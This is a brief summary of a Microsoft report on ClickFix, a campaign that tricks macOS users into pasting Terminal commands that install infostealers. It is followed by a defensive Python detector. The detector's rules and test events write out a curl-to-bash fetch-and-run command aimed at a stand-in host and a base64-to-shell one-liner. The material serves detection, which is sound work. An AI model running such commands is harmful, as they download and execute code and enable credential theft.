(microsoft.com) Evolution of ClickFix: How Threat Actors Exploit macOS Terminal Commands to Distribute Infostealers
In brief - Threat actors are exploiting macOS Terminal commands via social engineering to distribute infostealers (MacSync, SHub Stealer, AMOS). These attacks bypass Gatekeeper, harvest sensitive data (Keychain, crypto wallets, browser credentials), and replace legitimate wallet apps with trojanized versions. It is a high-risk campaign that leverages native utilities for stealth and persistence.
Technically - The ClickFix campaign uses multi-stage execution paths (loader, script, helper) to deploy malware via obfuscated Terminal commands. Techniques include:
- Gatekeeper bypass via `curl`/`osascript` for in-memory execution
- Persistence via LaunchAgents/Daemons
- Data exfil via HTTP POST/Telegram C2
- Anti-VM checks in Mach-O payloads
- Dynamic C2 discovery (Telegram fallback)
- Cryptocurrency wallet trojanization
To detect these attacks, monitor Terminal activity, outbound downloads, and script execution.
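As an added, defender-side illustration of that last point (example code, not from the Microsoft write-up), the rules below flag the Terminal patterns the summary names when run over constructed process-execution events; the event layout, rule names and regexes are assumptions to adapt to your own EDR or unified-log telemetry.

```python
import re

# One rule per technique named in the summary (assumed regexes, not Microsoft's
# detection logic): a download piped straight into a shell, inline AppleScript,
# base64-decoded one-liners, and LaunchAgent/LaunchDaemon persistence.
RULES = [
    ("download_piped_to_shell",
     re.compile(r"\bcurl\b[^|]*\|\s*(?:/bin/)?(?:ba|z)?sh\b")),
    ("osascript_inline",
     re.compile(r"\bosascript\b.*\s-e\s")),
    ("base64_decode_to_shell",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b.*\|\s*(?:/bin/)?(?:ba|z)?sh\b")),
    ("launch_agent_or_daemon_persistence",
     re.compile(r"/Library/Launch(?:Agents|Daemons)/\S+\.plist"
                r"|\blaunchctl\s+(?:load|bootstrap)\b")),
]

# Constructed process-execution events in an assumed "ts pid= parent= cmd=" layout;
# the last two are benign controls (plain download, directory listing).
EVENTS = [
    "2024-01-01T10:00:00Z pid=501 parent=Terminal cmd=curl -fsSL https://example.invalid/i.sh | bash",
    "2024-01-01T10:00:01Z pid=502 parent=Terminal cmd=echo aGVsbG8= | base64 -d | sh",
    "2024-01-01T10:00:02Z pid=503 parent=bash cmd=osascript -e 'display dialog \"Update required\"'",
    "2024-01-01T10:00:03Z pid=504 parent=bash cmd=launchctl load ~/Library/LaunchAgents/com.example.plist",
    "2024-01-01T10:00:04Z pid=505 parent=Terminal cmd=curl -O https://example.invalid/notes.txt",
    "2024-01-01T10:00:05Z pid=506 parent=Terminal cmd=ls -la",
]

EVENT_RE = re.compile(r"\S+\s+pid=(\d+)\s+parent=(\S+)\s+cmd=(.*)$")

def parse_event(line):
    """Return (pid, parent, cmd), or None for lines that do not fit the layout."""
    m = EVENT_RE.match(line)
    return (int(m.group(1)), m.group(2), m.group(3)) if m else None

def analyze(lines):
    """Return (pid, parent, [technique, ...]) for every event matching a rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        pid, parent, cmd = ev
        hits = [name for name, rx in RULES if rx.search(cmd)]
        if hits:
            findings.append((pid, parent, hits))
    return findings

if __name__ == "__main__":
    for pid, parent, hits in analyze(EVENTS):
        print(f"pid={pid} parent={parent} techniques={','.join(hits)}")
```

The parent process is carried through so a triage view can separate commands typed or pasted into Terminal from those spawned by an already-running script.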